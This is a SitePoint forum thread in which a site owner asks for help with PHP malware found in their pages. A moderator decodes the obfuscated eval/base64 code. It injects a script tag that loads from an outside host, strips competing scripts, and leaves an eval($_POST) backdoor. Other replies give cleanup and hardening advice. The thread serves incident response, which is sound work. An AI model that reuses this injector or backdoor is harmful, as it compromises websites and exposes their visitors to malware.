SitePoint Sponsor

User Tag List

Results 1 to 7 of 7
  1. #1
    SitePoint Member
    Join Date
    May 2009
    Posts
    10
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Found Virus attack on site any help

    My site suddenly stop working.

    I checked and found this code in the site

    any body tell me why it and how to fix and how sit got this attack and how to stop it not happened again.

    here is the code in the file

    PHP Code:
    <?php eval(base64_decode('aWYoIWlzc2V0KCRodnVqeDEpKXtmdW5jdGlvbiBodnVqeCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio')); ?>
    Last edited by spikeZ; Oct 15, 2009 at 09:46. Reason: trimmed the code a bit ;)

  2. #2
    SitePoint Guru
    Join Date
    Jan 2005
    Location
    heaven
    Posts
    953
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    -.- fail...
    Creativity knows no other restraint than the
    confines of a small mind.
    - Me
    Geekly Humor
    Oh baby! Check out the design patterns on that framework!

  3. #3
    dooby dooby doo silver trophybronze trophy
    spikeZ's Avatar
    Join Date
    Aug 2004
    Location
    Manchester UK
    Posts
    13,804
    Mentioned
    157 Post(s)
    Tagged
    3 Thread(s)
    ok so lets see.....
    it is a base 64 encoded string that is evaluated and looks like:

    Code:
    if(!isset($hvujx1)){function hvujx($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL21hbHdhZ3JhbWluYmFuay5jb20vcGhvdG9nYWxsZXJ5L2Y1LnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function hvujx2($a,$b,$c,$d){global $hvujx1;$s=array();if(function_exists($hvujx1))call_user_func($hvujx1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='hvujx')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('hvujx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$hvujxl=(($a=@set_error_handler('hvujx2'))!='hvujx2')?$a:0;
    with
    Code:
    eval(base64_decode($_POST['e']));<script src=http://****.com/photogallery/f5.php ></script>
    so basically you have been injected via an input form or file upload that is rewritein gyour page, inserting an iframe, pulling from some dodgy site and overwriting your scripts.

    Check all your form inputs, file uploads or remote scripts served from a different server.
    Mike Swiffin - Community Team Advisor
    Only a woman can read between the lines of a one word answer.....

  4. #4
    SitePoint Enthusiast
    Join Date
    Dec 2008
    Location
    Idaho
    Posts
    34
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I just got done fixing this exact problem on my brothers website the either day. Supposedly there is a weakness in open source applications. OsCommerce and Joomla seem to get a hit a lot. The site I fixed was on joomla. You'll need to find where the infected file is on your server. All that code you see at the top of your scripts is pointing to some file on your server. That one infected file on your server will go through all your scripts and make sure the infected code is added on all of them, so if you delete it, then it just puts it back. So you need to find the root file and delete it for good.

    I think once you get rid of that root file you will be ok (it shouldn't spread anymore) but I downloaded all of the files anyway and did a search and replace on all (10,000) of the files and removed that piece of code at the top just to make sure. Took me about 6 hours to do everything... but its back up and running now.

    From looking at your code, it looks like it is getting a file from another server through Javascript, so just deleting each piece of code from your scripts should probably stop it.

    One tip to keep this from happening is to put all of your directories on 755 permissions or lower, and all your files at 644 permissions or lower.
    I used to eat all natural foods...
    until I found out most people die of natural causes.

  5. #5
    SitePoint Member
    Join Date
    May 2009
    Posts
    10
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    did alll this even file has 444 only read permions stil it got this issue again.

    any one suggest me why it is and where is the issue on my files or what ?

    And how i can get rid of this ?

  6. #6
    SitePoint Enthusiast Mounty's Avatar
    Join Date
    Mar 2008
    Location
    UK
    Posts
    90
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I know this is a few weeks old now but I'm also confused! If the infected script has 755 permissions (so read / execute only for others) then surely no one would be able to write malicious code into the script through the web? Or could a bug found in Joomla etc facilitate such actions?

  7. #7
    Non-Member
    Join Date
    Oct 2009
    Posts
    1,852
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It is better is to change ftp passwords immediately and do virus check on your computer.
    Some trojan program may steal ftp pass stored in the client data and put this code to site.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •